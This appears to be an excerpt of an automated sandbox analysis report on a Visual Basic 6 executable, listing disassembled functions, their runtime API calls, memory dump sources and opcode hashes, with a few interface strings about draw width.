Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00456C36
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00456C5D
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00456C7C
__vbaFreeObj.MSVBVM60 ref: 00456C8B
__vbaPowerR8.MSVBVM60(?,?,00000000,40000000), ref: 00456CFB
_adj_fdiv_m64.MSVBVM60(?,?), ref: 00456D2D
__vbaFpI4.MSVBVM60(?,?), ref: 00456D44
__vbaPowerR8.MSVBVM60(?,?,00000000,40000000), ref: 00456D63
_adj_fdiv_m64.MSVBVM60(?,?), ref: 00456DA2
__vbaFpI4.MSVBVM60(?,?), ref: 00456DB9
__vbaPowerR8.MSVBVM60(?,?,00000000,40000000), ref: 00456DE1
_adj_fdiv_m64.MSVBVM60(?,?), ref: 00456E25
__vbaFpI4.MSVBVM60(?,?), ref: 00456E3C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00456EB1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00456ED8
#588.MSVBVM60(00000000,00000000,00000000), ref: 00456EF5
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00456F13
__vbaFreeObj.MSVBVM60 ref: 00456F1C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00456F91
__vbaLateIdSt.MSVBVM60(00000000), ref: 00456F98
__vbaFreeObj.MSVBVM60 ref: 00456FA1
__vbaObjSet.MSVBVM60(?,00000000), ref: 00456FF2
__vbaLateIdSt.MSVBVM60(00000000), ref: 00456FF5
__vbaFreeObj.MSVBVM60 ref: 00457004
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457014
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00457033
__vbaFreeObj.MSVBVM60 ref: 0045703C

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Power_adj_fdiv_m64$ErrorLateNew2System$#588List
String ID:
API String ID: 413069731-0
Opcode ID: cfd2dbc0cf6a1f67a8d4fb20bcda6ca2b20251ad5429930ad2912b45c7106e73
Instruction ID: 57e286cddc90daa0478b18fd83f402a617fdaf33dc2f3e8ef01765a184397244
Opcode Fuzzy Hash: cfd2dbc0cf6a1f67a8d4fb20bcda6ca2b20251ad5429930ad2912b45c7106e73
Instruction Fuzzy Hash: 5DD1C074A00205DFDB14DFA4DC84BBABBB5FB48301F10827AE945A33A1EB785845CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00450A90, Relevance: 40.8, APIs: 27, Instructions: 304COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00450B33
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00450B5A
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00450B79
__vbaFreeObj.MSVBVM60 ref: 00450B88
__vbaPowerR8.MSVBVM60(?,?,00000000,40000000), ref: 00450BFA
_adj_fdiv_m64.MSVBVM60 ref: 00450C1D
__vbaFpI4.MSVBVM60 ref: 00450C2C
__vbaPowerR8.MSVBVM60(?,?,00000000,40000000), ref: 00450C53
_adj_fdiv_m64.MSVBVM60 ref: 00450C76
__vbaFpI4.MSVBVM60 ref: 00450C85
__vbaPowerR8.MSVBVM60(?,?,00000000,40000000), ref: 00450CB2
_adj_fdiv_m64.MSVBVM60 ref: 00450CD5
__vbaFpI4.MSVBVM60 ref: 00450CE4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00450CF9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00450D20
#588.MSVBVM60(00000000,00000000,00000000), ref: 00450D3D
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00450D5A
__vbaFreeObj.MSVBVM60 ref: 00450D63
__vbaObjSet.MSVBVM60(?,00000000), ref: 00450DDA
__vbaLateIdSt.MSVBVM60(00000000), ref: 00450DE1
__vbaFreeObj.MSVBVM60 ref: 00450DEA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00450E1C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00450E3B
__vbaFreeObj.MSVBVM60 ref: 00450E4A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00450E79
__vbaLateIdSt.MSVBVM60(00000000), ref: 00450E7C
__vbaFreeObj.MSVBVM60 ref: 00450E85

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Power_adj_fdiv_m64$ErrorLateNew2System$#588List
String ID:
API String ID: 413069731-0
Opcode ID: 4ba80286287bf62f77d1525b84363363e69050b35b82e04d39ae2f5af550f453
Instruction ID: 512ca10b2800352339511f1d546270840d9d2a62088892db210f6e27d338d5d8
Opcode Fuzzy Hash: 4ba80286287bf62f77d1525b84363363e69050b35b82e04d39ae2f5af550f453
Instruction Fuzzy Hash: 08C19174A00205DFDB04DFA4DD88ABEBBB8FB49701F10823AE945A33A1EB745845CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00453700, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401E96), ref: 0045371E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401E96), ref: 00453765
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401E96), ref: 00453786
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000130), ref: 004537D7
__vbaVarDup.MSVBVM60 ref: 00453862
__vbaVarDup.MSVBVM60 ref: 00453885
#596.MSVBVM60(?,?,00000002,0000000A,0000000A,0000000A,0000000A), ref: 004538AD
__vbaStrMove.MSVBVM60 ref: 004538B8
__vbaI2Str.MSVBVM60(00000000), ref: 004538BF
__vbaFreeStr.MSVBVM60 ref: 004538CC
__vbaFreeObj.MSVBVM60 ref: 004538D5
__vbaFreeVarList.MSVBVM60(00000007,?,?,00000002,0000000A,0000000A,0000000A,0000000A), ref: 004538FF
#561.MSVBVM60(00004002), ref: 00453929
__vbaVarDup.MSVBVM60 ref: 00453981
__vbaVarDup.MSVBVM60 ref: 004539A4
#595.MSVBVM60(?,00000010,?,0000000A,0000000A), ref: 004539BC
__vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,0000000A), ref: 004539D4

Strings

Error, xrefs: 00453964
You must type in a valid number!, xrefs: 00453987
Type in the desired Draw Width!, xrefs: 00453868

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$List$#561#595#596CheckChkstkErrorHresultMove
String ID: Error$Type in the desired Draw Width!$You must type in a valid number!
API String ID: 4153064456-2587403160
Opcode ID: 01b9b13f60cb7fd48003bd68ac7a860ebfce38f0a4b861c87be15891ac1514ab
Instruction ID: 0145b3018abad9c77d098a2ca34fea0fbfa139e0adc54622c2ce3d15b6e6bbdf
Opcode Fuzzy Hash: 01b9b13f60cb7fd48003bd68ac7a860ebfce38f0a4b861c87be15891ac1514ab
Instruction Fuzzy Hash: 4DA11AB5D00218DFDB14CF90C948BDDBBB8FF08304F108199E65AAB290D7745A89CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004599D0, Relevance: 39.4, APIs: 26, Instructions: 355COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000002,00000000,00000000,00000000,00000000), ref: 00459A4D
__vbaRedim.MSVBVM60(00000080,00000008,?,00000005,00000002,00000000,00000000,00000000,00000000), ref: 00459A6D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459AC5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00459AEC
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00459B0B
__vbaFreeObj.MSVBVM60 ref: 00459B39
#582.MSVBVM60(?,?), ref: 00459B4C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459C11
__vbaLateIdSt.MSVBVM60(00000000), ref: 00459C18
__vbaFreeObj.MSVBVM60 ref: 00459C21
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459C87
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00459CAE
__vbaFpI4.MSVBVM60(?), ref: 00459CF4
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00459D0A
__vbaFreeObj.MSVBVM60 ref: 00459D13
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459D86
__vbaLateIdSt.MSVBVM60(00000000), ref: 00459D8D
__vbaFreeObj.MSVBVM60 ref: 00459D96
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459DBE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00459DE1
__vbaFreeObj.MSVBVM60 ref: 00459DEA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459E19
__vbaLateIdSt.MSVBVM60(00000000), ref: 00459E20
__vbaFreeObj.MSVBVM60 ref: 00459E29
__vbaAryDestruct.MSVBVM60(00000000,?,00459E5B), ref: 00459E50
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00459E58

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Late$DestructErrorNew2RedimSystem$#582List
String ID:
API String ID: 3322945336-0
Opcode ID: 66390ba7f78981f08e515e774551f51956144074d5aed0c9f312a94bb623601b
Instruction ID: 2def3c78a4efc37f851ea36485e05b51396fc433de38ddd2183d6de8984d0c7e
Opcode Fuzzy Hash: 66390ba7f78981f08e515e774551f51956144074d5aed0c9f312a94bb623601b
Instruction Fuzzy Hash: 0DE15C70A00205DFDB04DFA9DDC4EADBBB9FB48700F108269E549A73A1EB74A845CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004691C0, Relevance: 39.2, APIs: 26, Instructions: 177COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 00469228
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 0046922F
__vbaI4Var.MSVBVM60(00000000), ref: 00469239
__vbaFreeObj.MSVBVM60 ref: 0046924C
__vbaFreeVar.MSVBVM60 ref: 00469255
__vbaObjSet.MSVBVM60(?,00000000), ref: 00469272
__vbaObjSet.MSVBVM60(?,00000000), ref: 00469292
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 00469299
__vbaI4Var.MSVBVM60(00000000), ref: 004692A3
__vbaStrI4.MSVBVM60(00000000), ref: 004692AA
__vbaStrMove.MSVBVM60 ref: 004692BB
__vbaStrCat.MSVBVM60(00000000), ref: 004692BE
__vbaStrMove.MSVBVM60 ref: 004692C9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A9F4,00000054), ref: 004692E2
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004692F2
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00469302
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046931E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00469339
__vbaLateIdCallLd.MSVBVM60(?,00000000), ref: 00469340
__vbaI4Var.MSVBVM60(00000000), ref: 0046934A
__vbaStrI4.MSVBVM60(00000000), ref: 00469351
__vbaStrMove.MSVBVM60 ref: 0046935C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A9F4,00000054), ref: 00469379
__vbaFreeStr.MSVBVM60 ref: 00469382
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00469392
__vbaFreeVar.MSVBVM60 ref: 0046939E

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CallLateListMove$CheckHresult
String ID:
API String ID: 2075553425-0
Opcode ID: f77cf46ce38e4e64abd602017b65b906876dfa6965cde25d4bfd46651ef0f5a4
Instruction ID: a85516282ce823c920fafe10bb4843dcc0334d252e67acf6f80a12c84d3264d3
Opcode Fuzzy Hash: f77cf46ce38e4e64abd602017b65b906876dfa6965cde25d4bfd46651ef0f5a4
Instruction Fuzzy Hash: DB512B71900209AFDB04DFA4DD89FAEBBBCEF48305F104529F506E61A1DA7499458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00458AF0, Relevance: 37.9, APIs: 25, Instructions: 358COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00458B98
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00458BBF
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00458BE4
__vbaFreeObj.MSVBVM60 ref: 00458BEF
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458C55
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00458C7C
__vbaSetSystemError.MSVBVM60(?,-00000001,-00000001), ref: 00458C9D
__vbaFreeObj.MSVBVM60 ref: 00458CA2
__vbaFpI4.MSVBVM60 ref: 00458D1E
__vbaFpI4.MSVBVM60 ref: 00458D70
__vbaFpI4.MSVBVM60 ref: 00458DB9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458E31
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00458E58
#588.MSVBVM60(00000000,00000000,00000000), ref: 00458E75
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00458E92
__vbaFreeObj.MSVBVM60 ref: 00458E9B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458F0E
__vbaLateIdSt.MSVBVM60(00000000), ref: 00458F15
__vbaFreeObj.MSVBVM60 ref: 00458F1E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458F50
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00458F6F
__vbaFreeObj.MSVBVM60 ref: 00458F7E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458FAD
__vbaLateIdSt.MSVBVM60(00000000), ref: 00458FB0
__vbaFreeObj.MSVBVM60 ref: 00458FB9

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorSystem$LateNew2$#588List
String ID:
API String ID: 3248396246-0
Opcode ID: ae1cb1d20823fb5ad52f993728f274abb02952b86e15f313ad7aad4496bb9773
Instruction ID: 5f02c9557bee34323740765aff18198ef330eaa8c5514f8810720fade2c95a7c
Opcode Fuzzy Hash: ae1cb1d20823fb5ad52f993728f274abb02952b86e15f313ad7aad4496bb9773
Instruction Fuzzy Hash: 06D19F71A00205DBDB14DFA4DC84BB97BB9FB49300F14827AE885F72A1EB749845CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00457920, Relevance: 36.3, APIs: 24, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 004579C3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 004579EA
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00457A09
__vbaFreeObj.MSVBVM60 ref: 00457A18
_adj_fdiv_m64.MSVBVM60 ref: 00457AA3
__vbaFpI4.MSVBVM60 ref: 00457AB2
_adj_fdiv_m64.MSVBVM60 ref: 00457AF2
__vbaFpI4.MSVBVM60 ref: 00457B01
_adj_fdiv_m64.MSVBVM60 ref: 00457B47
__vbaFpI4.MSVBVM60 ref: 00457B56
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457B6B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00457B92
#588.MSVBVM60(00000000,00000000,00000000), ref: 00457BAF
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00457BCD
__vbaFreeObj.MSVBVM60 ref: 00457BD6
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457C4B
__vbaLateIdSt.MSVBVM60(00000000), ref: 00457C52
__vbaFreeObj.MSVBVM60 ref: 00457C5B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457C8D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00457CAC
__vbaFreeObj.MSVBVM60 ref: 00457CBB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457CEA
__vbaLateIdSt.MSVBVM60(00000000), ref: 00457CED
__vbaFreeObj.MSVBVM60 ref: 00457CF6

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$_adj_fdiv_m64$ErrorLateNew2System$#588List
String ID:
API String ID: 72533341-0
Opcode ID: 09a519af3c7af0e23d8569696c55906da2a27eb5c0cafbaa873a9290087aa825
Instruction ID: 1de610131c9d4e4685bef7ad2508317df007a81de342ec7c704f67c5cd0a33b6
Opcode Fuzzy Hash: 09a519af3c7af0e23d8569696c55906da2a27eb5c0cafbaa873a9290087aa825
Instruction Fuzzy Hash: 5DB18370A00205DFCB04DFA5DD84ABABBB9FB49705F10813AE945E32B1EB749845CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00450680, Relevance: 36.3, APIs: 24, Instructions: 288COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00450723
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 0045074A
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00450769
__vbaFreeObj.MSVBVM60 ref: 00450778
_adj_fdiv_m64.MSVBVM60 ref: 004507FC
__vbaFpI4.MSVBVM60 ref: 0045080D
_adj_fdiv_m64.MSVBVM60 ref: 00450846
__vbaFpI4.MSVBVM60 ref: 00450857
_adj_fdiv_m64.MSVBVM60 ref: 00450894
__vbaFpI4.MSVBVM60 ref: 004508A5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004508BA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 004508E1
#588.MSVBVM60(00000000,00000000,00000000), ref: 004508FE
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 0045091C
__vbaFreeObj.MSVBVM60 ref: 00450925
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045099A
__vbaLateIdSt.MSVBVM60(00000000), ref: 004509A1
__vbaFreeObj.MSVBVM60 ref: 004509AA
__vbaObjSet.MSVBVM60(?,00000000), ref: 004509DC
